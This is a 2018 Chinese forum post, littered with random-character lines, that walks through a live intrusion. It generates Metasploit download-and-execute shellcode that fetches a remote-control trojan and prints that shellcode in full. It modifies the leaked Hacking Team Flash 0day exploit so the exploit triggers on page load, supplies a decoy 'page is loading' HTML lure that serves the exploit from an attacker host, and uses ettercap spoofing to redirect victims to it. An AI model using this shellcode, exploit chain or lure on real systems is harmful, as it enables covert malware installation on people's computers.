|
L3 I8 B$ n# J( m8 o
三、flash 0day之手工代码修改制作下载者实例入侵演示
: N1 ]8 V) Y6 \. c( z5 |4 G' }
8 a. h8 c" n5 w) e- J+ `
9 O8 K5 o2 z) M$ n 利用到的工具:
$ {! ?7 C* e5 `3 o% s ; N, t9 f, v- M3 l! Z/ p
( w0 M4 W" W" f u% e0 u# g% W v Msf
7 H% a8 d& V* k8 Z0 {7 k5 c
4 L5 v! b1 W4 x8 D4 Q v
" S) G. |- G2 p5 v" G+ P Ettercap
, D) u( N! h3 @* Q( p, n
. Z$ Y8 c0 o( w }! b" r" _
1 J. a* `& ~) |; u Adobe Flash CS6
% K7 `# R" Q' t2 ` X. H7 F6 p( ]- n
2 Y& M" `" L- T1 G0 v& [; B& A$ K
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 ( ~! x" M1 p R3 ?
" J4 h* [" _1 i. r/ A1 W
) k# i5 k% n2 V 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
4 d7 X7 X! @) e k7 ]$ [
% s! h* z) H* a9 ~. g; M3 \( u- a$ J5 K+ t. S1 f. s, _
如图:
, D9 V' R: Z! p3 T" L# p2 a7 j) G 3 p8 { r% b+ c# D
0 Y% I$ c0 ^2 f% i
" E5 ]4 @$ V2 ?( M8 A& A
7 A: F; [* g8 J" j- \2 h
/ ~& [, M0 F9 `! Y& p 
W5 m* f. }4 `& y: D
0 Z4 H! r$ |* ]8 C* \5 y, K' H! v3 ^( O `3 a$ R9 O( q
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
) B- Y# b+ j7 Y
6 x* i7 Y+ ^0 t% s( {; ^; G! p9 `7 H/ U- @* T5 `' I
0 v" X1 H: F3 u9 ? * u3 J, Q" m- i7 R& `5 D
+ `; p# ~. [+ d6 p, c* m# D  , r! l% ? J! L- C6 Q9 f) L: z
9 i: o0 l1 g H+ R1 Y8 @4 c" I" y
$ f# N; f7 h6 ?+ a+ o 然后执行generate -t dword生成shellcode,如下: , l7 \9 y: j$ E; v
6 k) ]& _+ G- O. a
% R+ m) { }7 L9 [& J) u( a 
/ z# N5 H" A; t; N9 u1 C( O * L. b# `! u! b& ^0 W
) J) @. }1 ~0 y; k+ a1 v3 i4 w/ @ ?2 s 复制代码到文本下便于我们一会编辑flash exp,如下:
( U+ Y: x6 B/ p: I @. b8 U
5 H0 u' o! w4 B3 P+ c! C3 p6 ], ~" ~' Q1 `% @
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
0 u9 {" o0 S: L f
0 A3 y2 m: o* N T( A% U( \3 b x% }1 J. d% ]7 o
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
' I- S, B. p) V8 B" J. ] L, p$ H! R4 Z
8 E3 M7 |7 |2 s2 c4 q0 e
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 1 t- w! r6 ~9 ^( N& N, ], A
8 K6 @: E' Q! J+ U1 u, h; S) K" n H) T
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
0 o M5 u: [3 Z* M! E
8 m8 r) W6 {0 u6 E' Y8 K x
: ~3 E4 l$ s. }: |% E 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, 3 x2 k( s9 I: B0 w
: d7 \2 g- P0 X3 ^9 G: B
6 \1 N& `) b7 j8 y7 i/ y 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
6 P+ C- n# a. _+ a6 O& j( H0 H 0 _4 D% p* ^. x+ t2 h0 P; }# m
' y$ o `4 m: w5 w% E 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, % Q5 I9 v+ [' u8 E1 p
" R# u" i8 Z. d& _
P2 h5 f) @5 Y1 n5 h D4 B% e 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
- f# m+ n o% a. @' [) X - e. a& L V9 F i. [+ y3 r* G3 ?
2 {( O2 L" N0 m; t/ M7 z9 Z 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 6 u( [: n1 N# r7 M3 m
, H K1 n6 k' F" h7 G5 r- V
& _9 a9 Y4 C6 K 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, % Z' [3 G: j( F; Z
6 Z) B& s6 U4 {7 X* e) _% t/ P% k
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, . c$ L' x9 L( ^' I
* U3 x& p+ N8 r# K+ G
+ M _. b% j' T, ^4 p 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, " @ B. n$ Y" d. l2 A" }3 y% @% v
0 k0 z3 \1 e* ~- Q7 R! U* k
/ Z& e, u1 {$ g" ?" o2 n& F 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
' E) e# k# n1 v( A3 E" D: R & \4 V) D4 R. P# b, T* V
2 o$ H- i/ @6 r9 R
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 ' k; v1 {0 _5 L' o6 ]( c& H
) p6 j( h" n! X2 s
/ }! p- \( T; ?* I
p0 @6 }# O9 h4 l: D 5 x% H- s+ f* p. {. K: o
0 C0 [% l; W$ r& D
3 v0 J' g, M5 d+ ]1 S d) c, m / s( W. Y# F' F. E: y) H' I+ Z7 Y
8 b; ?: `- ?6 d. l* z 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 3 I" f: _* B) d/ N; M
+ @, [ W' f; N/ _, \9 t7 E8 P& w/ q2 d y2 O, ~
9 G$ y5 G, j& k+ d9 H
3 g- E7 D" A2 k- t2 T$ l& W. o, f; t
先修改ShellWin32.as,部分源代码如图:
- k# x7 _; s1 j5 z) C / w. g. ^! x5 N& V* R- C/ N
+ V0 k5 {- L0 y: D1 x 
& M" m) O( z2 t* a2 ]- S- j: h * ^( [( O" t3 h! {0 U
! M/ v" W4 }$ Z 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 5 v' F1 t; f$ y7 W0 r6 q& X
2 V: Q5 O0 R2 r# r' d; W5 [
7 c0 g( w9 b2 H7 k0 ]5 n  2 \6 I' t" {" P" c( {1 E' } @, k$ \
9 w0 D- b. Y6 }4 n7 j
0 I9 z7 ~# C' \/ ^ 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: U! v: {- z" Q7 ~( D( ?$ z
. D; q: p5 c6 }8 P4 ^7 E+ Z. T- e6 [* [9 `+ e
 4 u, d! u7 Q* h$ B! K( a+ a2 a; \
4 O* H: |: k/ L, l0 x# h& B8 D! F" ~5 y
换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 0 X q2 i8 r% |, | c) ]; m
- ^$ v8 L( d% _5 |4 a8 [4 r/ [2 c, u
0 f" j7 k$ S" |) m; e/ [8 ]
1 J7 a% V o* F1 I$ f9 b* K0 I
. d ~# W y, N' [
) ~ O& O8 m9 i
0 a/ ^( x7 t! X
9 I8 l9 w/ d. O* ]+ S 
1 j2 R0 f; v2 C& V- V & I, e+ d/ a% E; @; I; T4 Q
3 _5 e/ {' j' Z7 J8 w/ Z4 h
然后点保存,下面我们来编译一下,打开 ) s0 v+ y4 k$ }' k2 _* S$ ?
3 @2 m5 o7 j* W' j- N, \
& X# a6 {8 o# f* H: ~& z7 d: c Q exp1.fla然后点文件-发布,看看编译没错误
9 }8 D5 c! S8 i5 u: x
& }: q; g6 l- h# U) H" I U8 ]$ J$ Y, F, Q
8 }$ I9 O5 F% K" W
\7 c* |/ [: J0 e
+ W" O$ g. o6 m# k c* e' Z/ [3 {
% B7 A8 P! U; h4 y
h* e8 o) d" c8 }/ T
0 L- i T4 B t+ B4 Y. p
4 \5 H0 l+ `1 O5 A; ?: U: o) j
/ w c0 f% c# l% |: Q2 q. t
% ^5 U, b' l$ t7 R) F. W W # P6 u& f% y/ v" e
7 i: H! Q- c2 H3 d. A
然后我们把生成的 9 y+ j/ q( Q8 A. T
a2 |7 i" J3 X( M5 F9 C% P8 Z
2 g0 |2 k3 D4 }7 v$ m2 ]) T
exp1.swf丢到kailinux 的/var/www/html下: $ o8 l- t6 m; p3 v: p5 r- z& c
4 Z M1 |) o) ~$ k/ J& w, {" T2 M! M: V$ g
然后把这段代码好好编辑一下 & Q$ s; \+ v( C
. Z% x- x) [8 d* [) E8 g- y
* M! q8 _1 D8 ^4 ^& @- R8 n1 a0 l! t ; `: m% b E* R4 J
- t' C. O/ ?! {) L8 W4 a; M
/ t+ ?9 G# @# Q+ D0 N& Z
0 i6 ]2 k) s5 O/ x2 Q7 c# u
& P M- r# m$ \6 Q: ?# O$ d7 _0 K7 s( s9 _9 i* q9 q
6 j1 X! n7 v5 d8 N% l 9 x, m4 |5 y x: W2 W( z- g9 Q
& V( ^; r) T: L0 s' D
! R' ~& q! X$ R* v$ H5 {' i7 G2 r$ z
0 B+ t0 ?9 t) b7 ]! p9 M; k9 [) O5 K: J' L' P) X3 _$ l6 a$ m
( W* f" z2 H( ]% A p3 V
2 x7 S V/ ]$ H+ k p! y/ }* A) `0 G x9 m. z4 `
4 i% [/ r: @; r' a* Y; k ) U& J. C0 d' M- v( V7 I6 U
5 q4 }/ V: B' k- K( O
<!DOCTYPE html> / Q$ l& Z1 m$ ^! Y: p. l- b1 Z5 w
! g" w* l0 a6 U5 @
$ o9 c2 R! c( b8 q3 }
<html> & F& @. t7 ~' g% E
. B$ F/ L2 l5 k) |
1 ] Q, p7 L s- H8 {6 L3 \2 A <head>
. k- B+ k; C+ E9 o: } 0 `' U/ x, U& l7 X. ~
( u$ C; t$ T9 \# h& W+ Y, X <meta http-equiv="Content-Type" content="text/html;
9 \) r* }! i* C; E0 Q6 O
; Y2 o- J) V+ |2 U
7 b! P/ }2 V- y& f charset=utf-8"/>
: m5 J- A' F8 h! _0 M) u" K$ ?
; o; E) E$ v4 S" d( ?, k; N; l% K! F' C
</head>
+ k9 ~$ @$ ]7 D1 r
( ]( G! C: ~" S" c7 n8 O' k2 K% o: w4 h4 i
<body>
9 I2 y3 z& S6 M6 a: l% {. T+ S/ e / I+ S6 C) E4 [/ l
) P/ F, t2 A- b( h
<h2> Please wait, the requested page is loading...</h2>
4 J6 ^$ j- G$ n8 @/ f# g' F . u. p( I# T/ T; O, R
" \9 |' }3 p* ^7 j <br> # n4 Z" Q( T- [1 ^9 p
, {3 ]4 a3 | K% n
7 T5 t3 y& p! Q3 ] <OBJECT 7 Y3 ]$ d: G( H3 J
F3 F- e- @ ?) f4 o5 t) X2 ^- b _6 t
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie
; x" O/ Z6 b1 q9 B8 [: c
6 }* b! p6 g5 ?9 h$ |+ F' @( {9 L$ @: g( h
VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
1 S% m1 k6 C1 z& L4 R# S 5 V# I2 [4 j8 O# P2 Z
3 ?( J* p6 _" e9 x2 O
</body> : B- Y2 r7 v( p- r# R7 d' L6 D
, W$ k* E1 H9 }" U0 b
8 ~! m* C6 `! K) e+ p5 c <script>
- ]9 |+ `" X. z* {. V * i* _* V' k3 S4 ?4 w6 q
4 ~5 l8 o3 c* `, x. \
setTimeout(function () {
" G4 A1 \7 j; I. P( l' N
: F- ]) S+ D- ^8 [% J
J+ @( |: Y. J" L1 N8 @
9 H3 O, V; x$ B9 } / A5 J+ X% [5 S+ N3 j, V1 J
1 G! K+ t: u+ k$ |+ A$ v window.location.reload(); + t4 P4 a9 [" [5 x& E
: y: ^+ V/ g* T) ~# |) A
( v) q2 s: R- Z' _ }, 10000);
: s7 G( b! M+ c7 C. M ^! d M
/ j9 W t0 i9 H; {2 ]9 r! I
2 @0 ]4 o$ W8 L1 d+ ^/ d+ g : T7 ~' b9 A4 ^. X7 {4 l
2 L [& S2 T2 t- \7 o7 m
) N( u$ }+ H2 @& |, V1 k* S
</script> 3 y+ A0 Y. D9 J" M a
1 \2 y8 D% m% b+ ^* m% O0 `
$ V$ E5 a) m. j \( O </html>
" K9 ^% D Q5 d& X
- X" r% R9 L% X* u( ~4 A5 ~' n
5 s+ \! d9 R# M2 `' ` 4 @( n+ L5 |4 o3 \. i& N
7 }& n5 r2 F6 k0 ^* Y4 E6 |, ?) I8 @. r1 W4 ^: e
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: . R# N5 _( i; ^4 i' U/ a' [$ X1 _
0 A8 o& A& h9 _* V% j
0 T: n8 H0 M7 }  . ]' d. y5 j5 ]4 y! E) Z+ T
; M; Q8 C6 z% h/ V h! ]: ? |2 n" J
3 _7 e3 r* X/ V 2 d& ]) S5 Q, E. }' m2 l
# `, r2 H# F% f* A: n/ D0 m& |& S$ U
. b. r; g; e8 [. H7 q' X , t) U7 W( `' c$ E' k
3 h$ P: x3 H; O0 r: }2 ?
8 m& P1 d) \5 Y, G
: P" F' H% J S5 [" `# L6 w0 `' n& P" ^. b% h
. l; V/ t, t, e: ~0 Y; K- U- c
t" S4 H: j0 U
3 k2 o# L4 t9 | 下面我们用ettercap欺骗如图:
, ~ ~; A7 j2 X8 H) G! J' k; h2 _ , t8 E7 C, j" e& i1 @2 y
@- U# Q3 f: y4 F) Y3 t4 D
 3 x: |9 Y1 r* ^9 k
8 U% e, d* k, R" O8 h
) {2 e( A$ o: o- n+ Z* U( z
. I. ~9 y% I( T5 r- v- q
/ b: P l4 e# g0 d+ s* q; @ l0 ~3 W1 O+ B
下面我们随便访问个网站看看: + U+ v; T/ {! w W; K7 X
5 M& `4 d( [ i5 @8 a4 ~- w* N) E4 ?. I1 F9 u6 x2 ?
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: ; v6 o5 c# C5 w( @1 R- V1 i
7 ^6 ?8 F( w k4 v, J& l
- y+ A4 D9 ~4 h% C$ B* [! r- u/ D4 S
 ! x7 M4 s$ v1 r9 m% z7 {0 Q
% ]4 ]' @4 @/ _
! e/ N% j9 M% V4 o+ S2 y 我们看另一台, / ? G2 F# V2 s' i7 i2 A
. D& ~; g4 }. N/ b
+ @9 {! S, ^6 ]3 ^. Y3 _- R
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
$ q4 x4 p( E$ v Q# G! D; W | 
发表于 2018-10-20 20:28:55
收藏
支持
反对